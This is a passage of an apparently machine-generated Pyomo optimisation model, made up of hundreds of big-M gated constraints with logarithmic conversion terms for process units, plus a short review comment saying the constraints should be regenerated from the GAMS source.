m.c2008 = Constraint(expr=(m.x1348/(0.001 + 0.999*m.b1543) - 0.75*log(1 + m.x1294/(0.001 + 0.999*m.b1543)))*(0.001 + 0.999*m.b1543) <= 0)
m.c2009 = Constraint(expr= m.x1295 == 0)
m.c2010 = Constraint(expr= m.x1296 == 0)
m.c2011 = Constraint(expr= m.x1297 == 0)
m.c2012 = Constraint(expr= m.x1349 == 0)
m.c2013 = Constraint(expr= m.x1350 == 0)
m.c2014 = Constraint(expr= m.x1351 == 0)
m.c2015 = Constraint(expr= m.x995 - m.x1292 - m.x1295 == 0)
m.c2016 = Constraint(expr= m.x996 - m.x1293 - m.x1296 == 0)
m.c2017 = Constraint(expr= m.x997 - m.x1294 - m.x1297 == 0)
m.c2018 = Constraint(expr= m.x1022 - m.x1346 - m.x1349 == 0)
m.c2019 = Constraint(expr= m.x1023 - m.x1347 - m.x1350 == 0)
m.c2020 = Constraint(expr= m.x1024 - m.x1348 - m.x1351 == 0)
m.c2021 = Constraint(expr= m.x1292 - 3.04984759446376*m.b1541 <= 0)
m.c2022 = Constraint(expr= m.x1293 - 3.04984759446376*m.b1542 <= 0)
m.c2023 = Constraint(expr= m.x1294 - 3.04984759446376*m.b1543 <= 0)
m.c2024 = Constraint(expr= m.x1295 + 3.04984759446376*m.b1541 <= 3.04984759446376)
m.c2025 = Constraint(expr= m.x1296 + 3.04984759446376*m.b1542 <= 3.04984759446376)
m.c2026 = Constraint(expr= m.x1297 + 3.04984759446376*m.b1543 <= 3.04984759446376)
m.c2027 = Constraint(expr= m.x1346 - 1.04900943706034*m.b1541 <= 0)
m.c2028 = Constraint(expr= m.x1347 - 1.04900943706034*m.b1542 <= 0)
m.c2029 = Constraint(expr= m.x1348 - 1.04900943706034*m.b1543 <= 0)
m.c2030 = Constraint(expr= m.x1349 + 1.04900943706034*m.b1541 <= 1.04900943706034)
m.c2031 = Constraint(expr= m.x1350 + 1.04900943706034*m.b1542 <= 1.04900943706034)
m.c2032 = Constraint(expr= m.x1351 + 1.04900943706034*m.b1543 <= 1.04900943706034)
# unit gated by b1544..b1546 (conversion factor 0.8)
m.c2033 = Constraint(expr=(m.x1352/(0.001 + 0.999*m.b1544) - 0.8*log(1 + m.x1298/(0.001 + 0.999*m.b1544)))*(0.001 + 0.999*m.b1544) <= 0)
m.c2034 = Constraint(expr=(m.x1353/(0.001 + 0.999*m.b1545) - 0.8*log(1 + m.x1299/(0.001 + 0.999*m.b1545)))*(0.001 + 0.999*m.b1545) <= 0)
m.c2035 = Constraint(expr=(m.x1354/(0.001 + 0.999*m.b1546) - 0.8*log(1 + m.x1300/(0.001 + 0.999*m.b1546)))*(0.001 + 0.999*m.b1546) <= 0)
m.c2036 = Constraint(expr= m.x1301 == 0)
m.c2037 = Constraint(expr= m.x1302 == 0)
m.c2038 = Constraint(expr= m.x1303 == 0)
m.c2039 = Constraint(expr= m.x1355 == 0)
m.c2040 = Constraint(expr= m.x1356 == 0)
m.c2041 = Constraint(expr= m.x1357 == 0)
m.c2042 = Constraint(expr= m.x998 - m.x1298 - m.x1301 == 0)
m.c2043 = Constraint(expr= m.x999 - m.x1299 - m.x1302 == 0)
m.c2044 = Constraint(expr= m.x1000 - m.x1300 - m.x1303 == 0)
m.c2045 = Constraint(expr= m.x1025 - m.x1352 - m.x1355 == 0)
m.c2046 = Constraint(expr= m.x1026 - m.x1353 - m.x1356 == 0)
m.c2047 = Constraint(expr= m.x1027 - m.x1354 - m.x1357 == 0)
m.c2048 = Constraint(expr= m.x1298 - 3.04984759446376*m.b1544 <= 0)
m.c2049 = Constraint(expr= m.x1299 - 3.04984759446376*m.b1545 <= 0)
m.c2050 = Constraint(expr= m.x1300 - 3.04984759446376*m.b1546 <= 0)
m.c2051 = Constraint(expr= m.x1301 + 3.04984759446376*m.b1544 <= 3.04984759446376)
m.c2052 = Constraint(expr= m.x1302 + 3.04984759446376*m.b1545 <= 3.04984759446376)
m.c2053 = Constraint(expr= m.x1303 + 3.04984759446376*m.b1546 <= 3.04984759446376)
m.c2054 = Constraint(expr= m.x1352 - 1.11894339953103*m.b1544 <= 0)
m.c2055 = Constraint(expr= m.x1353 - 1.11894339953103*m.b1545 <= 0)
m.c2056 = Constraint(expr= m.x1354 - 1.11894339953103*m.b1546 <= 0)
m.c2057 = Constraint(expr= m.x1355 + 1.11894339953103*m.b1544 <= 1.11894339953103)
m.c2058 = Constraint(expr= m.x1356 + 1.11894339953103*m.b1545 <= 1.11894339953103)
m.c2059 = Constraint(expr= m.x1357 + 1.11894339953103*m.b1546 <= 1.11894339953103)
# unit gated by b1547..b1549 (conversion factor 0.85)
m.c2060 = Constraint(expr=(m.x1358/(0.001 + 0.999*m.b1547) - 0.85*log(1 + m.x1304/(0.001 + 0.999*m.b1547)))*(0.001 + 0.999*m.b1547) <= 0)
m.c2061 = Constraint(expr=(m.x1359/(0.001 + 0.999*m.b1548) - 0.85*log(1 + m.x1305/(0.001 + 0.999*m.b1548)))*(0.001 + 0.999*m.b1548) <= 0)
m.c2062 = Constraint(expr=(m.x1360/(0.001 + 0.999*m.b1549) - 0.85*log(1 + m.x1306/(0.001 + 0.999*m.b1549)))*(0.001 + 0.999*m.b1549) <= 0)
# NOTE(review): machine-generated constraints (GAMS Convert output, see file
# header) -- regenerate from the GAMS source rather than hand-editing.
# Statements reflowed one per line; all tokens unchanged.  Pattern appears to
# be the same big-M on/off linearization used throughout this file -- TODO
# confirm against the original GAMS model.
m.c2063 = Constraint(expr= m.x1307 == 0)
m.c2064 = Constraint(expr= m.x1308 == 0)
m.c2065 = Constraint(expr= m.x1309 == 0)
m.c2066 = Constraint(expr= m.x1361 == 0)
m.c2067 = Constraint(expr= m.x1362 == 0)
m.c2068 = Constraint(expr= m.x1363 == 0)
m.c2069 = Constraint(expr= m.x1001 - m.x1304 - m.x1307 == 0)
m.c2070 = Constraint(expr= m.x1002 - m.x1305 - m.x1308 == 0)
m.c2071 = Constraint(expr= m.x1003 - m.x1306 - m.x1309 == 0)
m.c2072 = Constraint(expr= m.x1028 - m.x1358 - m.x1361 == 0)
m.c2073 = Constraint(expr= m.x1029 - m.x1359 - m.x1362 == 0)
m.c2074 = Constraint(expr= m.x1030 - m.x1360 - m.x1363 == 0)
m.c2075 = Constraint(expr= m.x1304 - 3.04984759446376*m.b1547 <= 0)
m.c2076 = Constraint(expr= m.x1305 - 3.04984759446376*m.b1548 <= 0)
m.c2077 = Constraint(expr= m.x1306 - 3.04984759446376*m.b1549 <= 0)
m.c2078 = Constraint(expr= m.x1307 + 3.04984759446376*m.b1547 <= 3.04984759446376)
m.c2079 = Constraint(expr= m.x1308 + 3.04984759446376*m.b1548 <= 3.04984759446376)
m.c2080 = Constraint(expr= m.x1309 + 3.04984759446376*m.b1549 <= 3.04984759446376)
m.c2081 = Constraint(expr= m.x1358 - 1.18887736200171*m.b1547 <= 0)
m.c2082 = Constraint(expr= m.x1359 - 1.18887736200171*m.b1548 <= 0)
m.c2083 = Constraint(expr= m.x1360 - 1.18887736200171*m.b1549 <= 0)
m.c2084 = Constraint(expr= m.x1361 + 1.18887736200171*m.b1547 <= 1.18887736200171)
m.c2085 = Constraint(expr= m.x1362 + 1.18887736200171*m.b1548 <= 1.18887736200171)
m.c2086 = Constraint(expr= m.x1363 + 1.18887736200171*m.b1549 <= 1.18887736200171)
# unit gated by b1550..b1552 (unit conversion in the log term)
m.c2087 = Constraint(expr=(m.x1376/(0.001 + 0.999*m.b1550) - log(1 + m.x1364/(0.001 + 0.999*m.b1550)))*(0.001 + 0.999*m.b1550) <= 0)
m.c2088 = Constraint(expr=(m.x1377/(0.001 + 0.999*m.b1551) - log(1 + m.x1365/(0.001 + 0.999*m.b1551)))*(0.001 + 0.999*m.b1551) <= 0)
m.c2089 = Constraint(expr=(m.x1378/(0.001 + 0.999*m.b1552) - log(1 + m.x1366/(0.001 + 0.999*m.b1552)))*(0.001 + 0.999*m.b1552) <= 0)
m.c2090 = Constraint(expr= m.x1367 == 0)
m.c2091 = Constraint(expr= m.x1368 == 0)
m.c2092 = Constraint(expr= m.x1369 == 0)
m.c2093 = Constraint(expr= m.x1379 == 0)
m.c2094 = Constraint(expr= m.x1380 == 0)
m.c2095 = Constraint(expr= m.x1381 == 0)
m.c2096 = Constraint(expr= m.x1034 - m.x1364 - m.x1367 == 0)
m.c2097 = Constraint(expr= m.x1035 - m.x1365 - m.x1368 == 0)
m.c2098 = Constraint(expr= m.x1036 - m.x1366 - m.x1369 == 0)
m.c2099 = Constraint(expr= m.x1040 - m.x1376 - m.x1379 == 0)
m.c2100 = Constraint(expr= m.x1041 - m.x1377 - m.x1380 == 0)
m.c2101 = Constraint(expr= m.x1042 - m.x1378 - m.x1381 == 0)
m.c2102 = Constraint(expr= m.x1364 - 1.18887736200171*m.b1550 <= 0)
m.c2103 = Constraint(expr= m.x1365 - 1.18887736200171*m.b1551 <= 0)
m.c2104 = Constraint(expr= m.x1366 - 1.18887736200171*m.b1552 <= 0)
m.c2105 = Constraint(expr= m.x1367 + 1.18887736200171*m.b1550 <= 1.18887736200171)
m.c2106 = Constraint(expr= m.x1368 + 1.18887736200171*m.b1551 <= 1.18887736200171)
m.c2107 = Constraint(expr= m.x1369 + 1.18887736200171*m.b1552 <= 1.18887736200171)
m.c2108 = Constraint(expr= m.x1376 - 0.78338879230327*m.b1550 <= 0)
m.c2109 = Constraint(expr= m.x1377 - 0.78338879230327*m.b1551 <= 0)
m.c2110 = Constraint(expr= m.x1378 - 0.78338879230327*m.b1552 <= 0)
m.c2111 = Constraint(expr= m.x1379 + 0.78338879230327*m.b1550 <= 0.78338879230327)
m.c2112 = Constraint(expr= m.x1380 + 0.78338879230327*m.b1551 <= 0.78338879230327)
m.c2113 = Constraint(expr= m.x1381 + 0.78338879230327*m.b1552 <= 0.78338879230327)
# unit gated by b1553..b1555 (conversion factor 1.2)
m.c2114 = Constraint(expr=(m.x1382/(0.001 + 0.999*m.b1553) - 1.2*log(1 + m.x1370/(0.001 + 0.999*m.b1553)))*(0.001 + 0.999*m.b1553) <= 0)
m.c2115 = Constraint(expr=(m.x1383/(0.001 + 0.999*m.b1554) - 1.2*log(1 + m.x1371/(0.001 + 0.999*m.b1554)))*(0.001 + 0.999*m.b1554) <= 0)
m.c2116 = Constraint(expr=(m.x1384/(0.001 + 0.999*m.b1555) - 1.2*log(1 + m.x1372/(0.001 + 0.999*m.b1555)))*(0.001 + 0.999*m.b1555) <= 0)
m.c2117 = Constraint(expr= m.x1373 == 0)
m.c2118 = Constraint(expr= m.x1374 == 0)
m.c2119 = Constraint(expr= m.x1375 == 0)
m.c2120 = Constraint(expr= m.x1385 == 0)
m.c2121 = Constraint(expr= m.x1386 == 0)
m.c2122 = Constraint(expr= m.x1387 == 0)
m.c2123 = Constraint(expr= m.x1037 - m.x1370 - m.x1373 == 0)
m.c2124 = Constraint(expr= m.x1038 - m.x1371 - m.x1374 == 0)
m.c2125 = Constraint(expr= m.x1039 - m.x1372 - m.x1375 == 0)
m.c2126 = Constraint(expr= m.x1043 - m.x1382 - m.x1385 == 0)
m.c2127 = Constraint(expr= m.x1044 - m.x1383 - m.x1386 == 0)
m.c2128 = Constraint(expr= m.x1045 - m.x1384 - m.x1387 == 0)
m.c2129 = Constraint(expr= m.x1370 - 1.18887736200171*m.b1553 <= 0)
m.c2130 = Constraint(expr= m.x1371 - 1.18887736200171*m.b1554 <= 0)
m.c2131 = Constraint(expr= m.x1372 - 1.18887736200171*m.b1555 <= 0)
m.c2132 = Constraint(expr= m.x1373 + 1.18887736200171*m.b1553 <= 1.18887736200171)
m.c2133 = Constraint(expr= m.x1374 + 1.18887736200171*m.b1554 <= 1.18887736200171)
m.c2134 = Constraint(expr= m.x1375 + 1.18887736200171*m.b1555 <= 1.18887736200171)
m.c2135 = Constraint(expr= m.x1382 - 0.940066550763924*m.b1553 <= 0)
m.c2136 = Constraint(expr= m.x1383 - 0.940066550763924*m.b1554 <= 0)
m.c2137 = Constraint(expr= m.x1384 - 0.940066550763924*m.b1555 <= 0)
m.c2138 = Constraint(expr= m.x1385 + 0.940066550763924*m.b1553 <= 0.940066550763924)
m.c2139 = Constraint(expr= m.x1386 + 0.940066550763924*m.b1554 <= 0.940066550763924)
m.c2140 = Constraint(expr= m.x1387 + 0.940066550763924*m.b1555 <= 0.940066550763924)
# linear unit gated by b1556..b1558 (fixed yield 0.75)
m.c2141 = Constraint(expr= - 0.75*m.x1388 + m.x1412 == 0)
m.c2142 = Constraint(expr= - 0.75*m.x1389 + m.x1413 == 0)
m.c2143 = Constraint(expr= - 0.75*m.x1390 + m.x1414 == 0)
m.c2144 = Constraint(expr= m.x1391 == 0)
m.c2145 = Constraint(expr= m.x1392 == 0)
m.c2146 = Constraint(expr= m.x1393 == 0)
m.c2147 = Constraint(expr= m.x1415 == 0)
m.c2148 = Constraint(expr= m.x1416 == 0)
m.c2149 = Constraint(expr= m.x1417 == 0)
m.c2150 = Constraint(expr= m.x1055 - m.x1388 - m.x1391 == 0)
m.c2151 = Constraint(expr= m.x1056 - m.x1389 - m.x1392 == 0)
m.c2152 = Constraint(expr= m.x1057 - m.x1390 - m.x1393 == 0)
m.c2153 = Constraint(expr= m.x1067 - m.x1412 - m.x1415 == 0)
m.c2154 = Constraint(expr= m.x1068 - m.x1413 - m.x1416 == 0)
m.c2155 = Constraint(expr= m.x1069 - m.x1414 - m.x1417 == 0)
m.c2156 = Constraint(expr= m.x1388 - 0.940066550763924*m.b1556 <= 0)
m.c2157 = Constraint(expr= m.x1389 - 0.940066550763924*m.b1557 <= 0)
m.c2158 = Constraint(expr= m.x1390 - 0.940066550763924*m.b1558 <= 0)
m.c2159 = Constraint(expr= m.x1391 + 0.940066550763924*m.b1556 <= 0.940066550763924)
m.c2160 = Constraint(expr= m.x1392 + 0.940066550763924*m.b1557 <= 0.940066550763924)
m.c2161 = Constraint(expr= m.x1393 + 0.940066550763924*m.b1558 <= 0.940066550763924)
m.c2162 = Constraint(expr= m.x1412 - 0.705049913072943*m.b1556 <= 0)
m.c2163 = Constraint(expr= m.x1413 - 0.705049913072943*m.b1557 <= 0)
m.c2164 = Constraint(expr= m.x1414 - 0.705049913072943*m.b1558 <= 0)
m.c2165 = Constraint(expr= m.x1415 + 0.705049913072943*m.b1556 <= 0.705049913072943)
m.c2166 = Constraint(expr= m.x1416 + 0.705049913072943*m.b1557 <= 0.705049913072943)
m.c2167 = Constraint(expr= m.x1417 + 0.705049913072943*m.b1558 <= 0.705049913072943)
# unit gated by b1559..b1561 (conversion factor 1.5)
m.c2168 = Constraint(expr=(m.x1418/(0.001 + 0.999*m.b1559) - 1.5*log(1 + m.x1394/(0.001 + 0.999*m.b1559)))*(0.001 + 0.999*m.b1559) <= 0)
m.c2169 = Constraint(expr=(m.x1419/(0.001 + 0.999*m.b1560) - 1.5*log(1 + m.x1395/(0.001 + 0.999*m.b1560)))*(0.001 + 0.999*m.b1560) <= 0)
m.c2170 = Constraint(expr=(m.x1420/(0.001 + 0.999*m.b1561) - 1.5*log(1 + m.x1396/(0.001 + 0.999*m.b1561)))*(0.001 + 0.999*m.b1561) <= 0)
m.c2171 = Constraint(expr= m.x1397 == 0)
m.c2172 = Constraint(expr= m.x1398 == 0)
m.c2173 = Constraint(expr= m.x1399 == 0)
m.c2174 = Constraint(expr= m.x1424 == 0)
m.c2175 = Constraint(expr= m.x1425 == 0)
m.c2176 = Constraint(expr= m.x1426 == 0)
m.c2177 = Constraint(expr= m.x1058 - m.x1394 - m.x1397 == 0)
m.c2178 = Constraint(expr= m.x1059 - m.x1395 - m.x1398 == 0)
m.c2179 = Constraint(expr= m.x1060 - m.x1396 - m.x1399 == 0)
m.c2180 = Constraint(expr= m.x1070 - m.x1418 - m.x1424 == 0)
m.c2181 = Constraint(expr= m.x1071 - m.x1419 - m.x1425 == 0) m.c2182 = Constraint(expr= m.x1072 - m.x1420 - m.x1426 == 0) m.c2183 = Constraint(expr= m.x1394 - 0.940066550763924*m.b1559 <= 0) m.c2184 = Constraint(expr= m.x1395 - 0.940066550763924*m.b1560 <= 0) m.c2185 = Constraint(expr= m.x1396 - 0.940066550763924*m.b1561 <= 0) m.c2186 = Constraint(expr= m.x1397 + 0.940066550763924*m.b1559 <= 0.940066550763924) m.c2187 = Constraint(expr= m.x1398 + 0.940066550763924*m.b1560 <= 0.940066550763924) m.c2188 = Constraint(expr= m.x1399 + 0.940066550763924*m.b1561 <= 0.940066550763924) m.c2189 = Constraint(expr= m.x1418 - 0.994083415506506*m.b1559 <= 0) m.c2190 = Constraint(expr= m.x1419 - 0.994083415506506*m.b1560 <= 0) m.c2191 = Constraint(expr= m.x1420 - 0.994083415506506*m.b1561 <= 0) m.c2192 = Constraint(expr= m.x1424 + 0.994083415506506*m.b1559 <= 0.994083415506506) m.c2193 = Constraint(expr= m.x1425 + 0.994083415506506*m.b1560 <= 0.994083415506506) m.c2194 = Constraint(expr= m.x1426 + 0.994083415506506*m.b1561 <= 0.994083415506506) m.c2195 = Constraint(expr= - m.x1400 + m.x1430 == 0) m.c2196 = Constraint(expr= - m.x1401 + m.x1431 == 0) m.c2197 = Constraint(expr= - m.x1402 + m.x1432 == 0) m.c2198 = Constraint(expr= - 0.5*m.x1406 + m.x1430 == 0) m.c2199 = Constraint(expr= - 0.5*m.x1407 + m.x1431 == 0) m.c2200 = Constraint(expr= - 0.5*m.x1408 + m.x1432 == 0) m.c2201 = Constraint(expr= m.x1403 == 0) m.c2202 = Constraint(expr= m.x1404 == 0) m.c2203 = Constraint(expr= m.x1405 == 0) m.c2204 = Constraint(expr= m.x1409 == 0) m.c2205 = Constraint(expr= m.x1410 == 0) m.c2206 = Constraint(expr= m.x1411 == 0) m.c2207 = Constraint(expr= m.x1433 == 0) m.c2208 = Constraint(expr= m.x1434 == 0) m.c2209 = Constraint(expr= m.x1435 == 0) m.c2210 = Constraint(expr= m.x1061 - m.x1400 - m.x1403 == 0) m.c2211 = Constraint(expr= m.x1062 - m.x1401 - m.x1404 == 0) m.c2212 = Constraint(expr= m.x1063 - m.x1402 - m.x1405 == 0) m.c2213 = Constraint(expr= m.x1064 - m.x1406 - m.x1409 == 0) m.c2214 = 
Constraint(expr= m.x1065 - m.x1407 - m.x1410 == 0) m.c2215 = Constraint(expr= m.x1066 - m.x1408 - m.x1411 == 0) m.c2216 = Constraint(expr= m.x1073 - m.x1430 - m.x1433 == 0) m.c2217 = Constraint(expr= m.x1074 - m.x1431 - m.x1434 == 0) m.c2218 = Constraint(expr= m.x1075 - m.x1432 - m.x1435 == 0) m.c2219 = Constraint(expr= m.x1400 - 0.940066550763924*m.b1562 <= 0) m.c2220 = Constraint(expr= m.x1401 - 0.940066550763924*m.b1563 <= 0) m.c2221 = Constraint(expr= m.x1402 - 0.940066550763924*m.b1564 <= 0) m.c2222 = Constraint(expr= m.x1403 + 0.940066550763924*m.b1562 <= 0.940066550763924) m.c2223 = Constraint(expr= m.x1404 + 0.940066550763924*m.b1563 <= 0.940066550763924) m.c2224 = Constraint(expr= m.x1405 + 0.940066550763924*m.b1564 <= 0.940066550763924) m.c2225 = Constraint(expr= m.x1406 - 30*m.b1562 <= 0) m.c2226 = Constraint(expr= m.x1407 - 30*m.b1563 <= 0) m.c2227 = Constraint(expr= m.x1408 - 30*m.b1564 <= 0) m.c2228 = Constraint(expr= m.x1409 + 30*m.b1562 <= 30) m.c2229 = Constraint(expr= m.x1410 + 30*m.b1563 <= 30) m.c2230 = Constraint(expr= m.x1411 + 30*m.b1564 <= 30) m.c2231 = Constraint(expr= m.x1430 - 15*m.b1562 <= 0) m.c2232 = Constraint(expr= m.x1431 - 15*m.b1563 <= 0) m.c2233 = Constraint(expr= m.x1432 - 15*m.b1564 <= 0) m.c2234 = Constraint(expr= m.x1433 + 15*m.b1562 <= 15) m.c2235 = Constraint(expr= m.x1434 + 15*m.b1563 <= 15) m.c2236 = Constraint(expr= m.x1435 + 15*m.b1564 <= 15) m.c2237 = Constraint(expr=(m.x1460/(0.001 + 0.999*m.b1565) - 1.25*log(1 + m.x1436/(0.001 + 0.999*m.b1565)))*(0.001 + 0.999*m.b1565) <= 0) m.c2238 = Constraint(expr=(m.x1461/(0.001 + 0.999*m.b1566) - 1.25*log(1 + m.x1437/(0.001 + 0.999*m.b1566)))*(0.001 + 0.999*m.b1566) <= 0) m.c2239 = Constraint(expr=(m.x1462/(0.001 + 0.999*m.b1567) - 1.25*log(1 + m.x1438/(0.001 + 0.999*m.b1567)))*(0.001 + 0.999*m.b1567) <= 0) m.c2240 = Constraint(expr= m.x1439 == 0) m.c2241 = Constraint(expr= m.x1440 == 0) m.c2242 = Constraint(expr= m.x1441 == 0) m.c2243 = Constraint(expr= m.x1463 == 0) m.c2244 = 
Constraint(expr= m.x1464 == 0) m.c2245 = Constraint(expr= m.x1465 == 0) m.c2246 = Constraint(expr= m.x1076 - m.x1436 - m.x1439 == 0) m.c2247 = Constraint(expr= m.x1077 - m.x1437 - m.x1440 == 0) m.c2248 = Constraint(expr= m.x1078 - m.x1438 - m.x1441 == 0) m.c2249 = Constraint(expr= m.x1091 - m.x1460 - m.x1463 == 0) m.c2250 = Constraint(expr= m.x1092 - m.x1461 - m.x1464 == 0) m.c2251 = Constraint(expr= m.x1093 - m.x1462 - m.x1465 == 0) m.c2252 = Constraint(expr= m.x1436 - 0.705049913072943*m.b1565 <= 0) m.c2253 = Constraint(expr= m.x1437 - 0.705049913072943*m.b1566 <= 0) m.c2254 = Constraint(expr= m.x1438 - 0.705049913072943*m.b1567 <= 0) m.c2255 = Constraint(expr= m.x1439 + 0.705049913072943*m.b1565 <= 0.705049913072943) m.c2256 = Constraint(expr= m.x1440 + 0.705049913072943*m.b1566 <= 0.705049913072943) m.c2257 = Constraint(expr= m.x1441 + 0.705049913072943*m.b1567 <= 0.705049913072943) m.c2258 = Constraint(expr= m.x1460 - 0.666992981045719*m.b1565 <= 0) m.c2259 = Constraint(expr= m.x1461 - 0.666992981045719*m.b1566 <= 0) m.c2260 = Constraint(expr= m.x1462 - 0.666992981045719*m.b1567 <= 0) m.c2261 = Constraint(expr= m.x1463 + 0.666992981045719*m.b1565 <= 0.666992981045719) m.c2262 = Constraint(expr= m.x1464 + 0.666992981045719*m.b1566 <= 0.666992981045719) m.c2263 = Constraint(expr= m.x1465 + 0.666992981045719*m.b1567 <= 0.666992981045719) m.c2264 = Constraint(expr=(m.x1466/(0.001 + 0.999*m.b1568) - 0.9*log(1 + m.x1442/(0.001 + 0.999*m.b1568)))*(0.001 + 0.999*m.b1568) <= 0) m.c2265 = Constraint(expr=(m.x1467/(0.001 + 0.999*m.b1569) - 0.9*log(1 + m.x1443/(0.001 + 0.999*m.b1569)))*(0.001 + 0.999*m.b1569) <= 0) m.c2266 = Constraint(expr=(m.x1468/(0.001 + 0.999*m.b1570) - 0.9*log(1 + m.x1444/(0.001 + 0.999*m.b1570)))*(0.001 + 0.999*m.b1570) <= 0) m.c2267 = Constraint(expr= m.x1445 == 0) m.c2268 = Constraint(expr= m.x1446 == 0) m.c2269 = Constraint(expr= m.x1447 == 0) m.c2270 = Constraint(expr= m.x1469 == 0) m.c2271 = Constraint(expr= m.x1470 == 0) m.c2272 = 
Constraint(expr= m.x1471 == 0) m.c2273 = Constraint(expr= m.x1079 - m.x1442 - m.x1445 == 0) m.c2274 = Constraint(expr= m.x1080 - m.x1443 - m.x1446 == 0) m.c2275 = Constraint(expr= m.x1081 - m.x1444 - m.x1447 == 0) m.c2276 = Constraint(expr= m.x1094 - m.x1466 - m.x1469 == 0) m.c2277 = Constraint(expr= m.x1095 - m.x1467 - m.x1470 == 0) m.c2278 = Constraint(expr= m.x1096 - m.x1468 - m.x1471 == 0) m.c2279 = Constraint(expr= m.x1442 - 0.705049913072943*m.b1568 <= 0) m.c2280 = Constraint(expr= m.x1443 - 0.705049913072943*m.b1569 <= 0) m.c2281 = Constraint(expr= m.x1444 - 0.705049913072943*m.b1570 <= 0) m.c2282 = Constraint(expr= m.x1445 + 0.705049913072943*m.b1568 <= 0.705049913072943) m.c2283 = Constraint(expr= m.x1446 + 0.705049913072943*m.b1569 <= 0.705049913072943) m.c2284 = Constraint(expr= m.x1447 + 0.705049913072943*m.b1570 <= 0.705049913072943) m.c2285 = Constraint(expr= m.x1466 - 0.480234946352917*m.b1568 <= 0) m.c2286 = Constraint(expr= m.x1467 - 0.480234946352917*m.b1569 <= 0) m.c2287 = Constraint(expr= m.x1468 - 0.480234946352917*m.b1570 <= 0) m.c2288 = Constraint(expr= m.x1469 + 0.480234946352917*m.b1568 <= 0.480234946352917) m.c2289 = Constraint(expr= m.x1470 + 0.480234946352917*m.b1569 <= 0.480234946352917) m.c2290 = Constraint(expr= m.x1471 + 0.480234946352917*m.b1570 <= 0.480234946352917) m.c2291 = Constraint(expr=(m.x1472/(0.001 + 0.999*m.b1571) - log(1 + m.x1421/(0.001 + 0.999*m.b1571)))*(0.001 + 0.999* m.b1571) <= 0) m.c2292 = Constraint(expr=(m.x1473/(0.001 + 0.999*m.b1572) - log(1 + m.x1422/(0.001 + 0.999*m.b1572)))*(0.001 + 0.999* m.b1572) <= 0) m.c2293 = Constraint(expr=(m.x1474/(0.001 + 0.999*m.b1573) - log(1 + m.x1423/(0.001 + 0.999*m.b1573)))*(0.001 + 0.999* m.b1573) <= 0) m.c2294 = Constraint(expr= m.x1427 == 0) m.c2295 = Constraint(expr= m.x1428 == 0) m.c2296 = Constraint(expr= m.x1429 == 0) m.c2297 = Constraint(expr= m.x1475 == 0) m.c2298 = Constraint(expr= m.x1476 == 0) m.c2299 = Constraint(expr= m.x1477 == 0) m.c2300 = Constraint(expr= 
m.x1070 - m.x1421 - m.x1427 == 0) m.c2301 = Constraint(expr= m.x1071 - m.x1422 - m.x1428 == 0) m.c2302 = Constraint(expr= m.x1072 - m.x1423 - m.x1429 == 0) m.c2303 = Constraint(expr= m.x1097 - m.x1472 - m.x1475 == 0) m.c2304 = Constraint(expr= m.x1098 - m.x1473 - m.x1476 == 0) m.c2305 = Constraint(expr= m.x1099 - m.x1474 - m.x1477 == 0) m.c2306 = Constraint(expr= m.x1421 - 0.994083415506506*m.b1571 <= 0) m.c2307 = Constraint(expr= m.x1422 - 0.994083415506506*m.b1572 <= 0) m.c2308 = Constraint(expr= m.x1423 - 0.994083415506506*m.b1573 <= 0) m.c2309 = Constraint(expr= m.x1427 + 0.994083415506506*m.b1571 <= 0.994083415506506) m.c2310 = Constraint(expr= m.x1428 + 0.994083415506506*m.b1572 <= 0.994083415506506) m.c2311 = Constraint(expr= m.x1429 + 0.994083415506506*m.b1573 <= 0.994083415506506) m.c2312 = Constraint(expr= m.x1472 - 0.690184503917672*m.b1571 <= 0) m.c2313 = Constraint(expr= m.x1473 - 0.690184503917672*m.b1572 <= 0) m.c2314 = Constraint(expr= m.x1474 - 0.690184503917672*m.b1573 <= 0) m.c2315 = Constraint(expr= m.x1475 + 0.690184503917672*m.b1571 <= 0.690184503917672) m.c2316 = Constraint(expr= m.x1476 + 0.690184503917672*m.b1572 <= 0.690184503917672) m.c2317 = Constraint(expr= m.x1477 + 0.690184503917672*m.b1573 <= 0.690184503917672) m.c2318 = Constraint(expr= - 0.9*m.x1448 + m.x1478 == 0) m.c2319 = Constraint(expr= - 0.9*m.x1449 + m.x1479 == 0) m.c2320 = Constraint(expr= - 0.9*m.x1450 + m.x1480 == 0) m.c2321 = Constraint(expr= m.x1451 == 0) m.c2322 = Constraint(expr= m.x1452 == 0) m.c2323 = Constraint(expr= m.x1453 == 0) m.c2324 = Constraint(expr= m.x1481 == 0) m.c2325 = Constraint(expr= m.x1482 == 0) m.c2326 = Constraint(expr= m.x1483 == 0) m.c2327 = Constraint(expr= m.x1082 - m.x1448 - m.x1451 == 0) m.c2328 = Constraint(expr= m.x1083 - m.x1449 - m.x1452 == 0) m.c2329 = Constraint(expr= m.x1084 - m.x1450 - m.x1453 == 0) m.c2330 = Constraint(expr= m.x1100 - m.x1478 - m.x1481 == 0) m.c2331 = Constraint(expr= m.x1101 - m.x1479 - m.x1482 == 0) m.c2332 = 
Constraint(expr= m.x1102 - m.x1480 - m.x1483 == 0) m.c2333 = Constraint(expr= m.x1448 - 15*m.b1574 <= 0) m.c2334 = Constraint(expr= m.x1449 - 15*m.b1575 <= 0) m.c2335 = Constraint(expr= m.x1450 - 15*m.b1576 <= 0) m.c2336 = Constraint(expr= m.x1451 + 15*m.b1574 <= 15) m.c2337 = Constraint(expr= m.x1452 + 15*m.b1575 <= 15) m.c2338 = Constraint(expr= m.x1453 + 15*m.b1576 <= 15) m.c2339 = Constraint(expr= m.x1478 - 13.5*m.b1574 <= 0) m.c2340 = Constraint(expr= m.x1479 - 13.5*m.b1575 <= 0) m.c2341 = Constraint(expr= m.x1480 - 13.5*m.b1576 <= 0) m.c2342 = Constraint(expr= m.x1481 + 13.5*m.b1574 <= 13.5) m.c2343 = Constraint(expr= m.x1482 + 13.5*m.b1575 <= 13.5) m.c2344 = Constraint(expr= m.x1483 + 13.5*m.b1576 <= 13.5) m.c2345 = Constraint(expr= - 0.6*m.x1454 + m.x1484 == 0) m.c2346 = Constraint(expr= - 0.6*m.x1455 + m.x1485 == 0) m.c2347 = Constraint(expr= - 0.6*m.x1456 + m.x1486 == 0) m.c2348 = Constraint(expr= m.x1457 == 0) m.c2349 = Constraint(expr= m.x1458 == 0) m.c2350 = Constraint(expr= m.x1459 == 0) m.c2351 = Constraint(expr= m.x1487 == 0) m.c2352 = Constraint(expr= m.x1488 == 0) m.c2353 = Constraint(expr= m.x1489 == 0) m.c2354 = Constraint(expr= m.x1085 - m.x1454 - m.x1457 == 0) m.c2355 = Constraint(expr= m.x1086 - m.x1455 - m.x1458 == 0) m.c2356 = 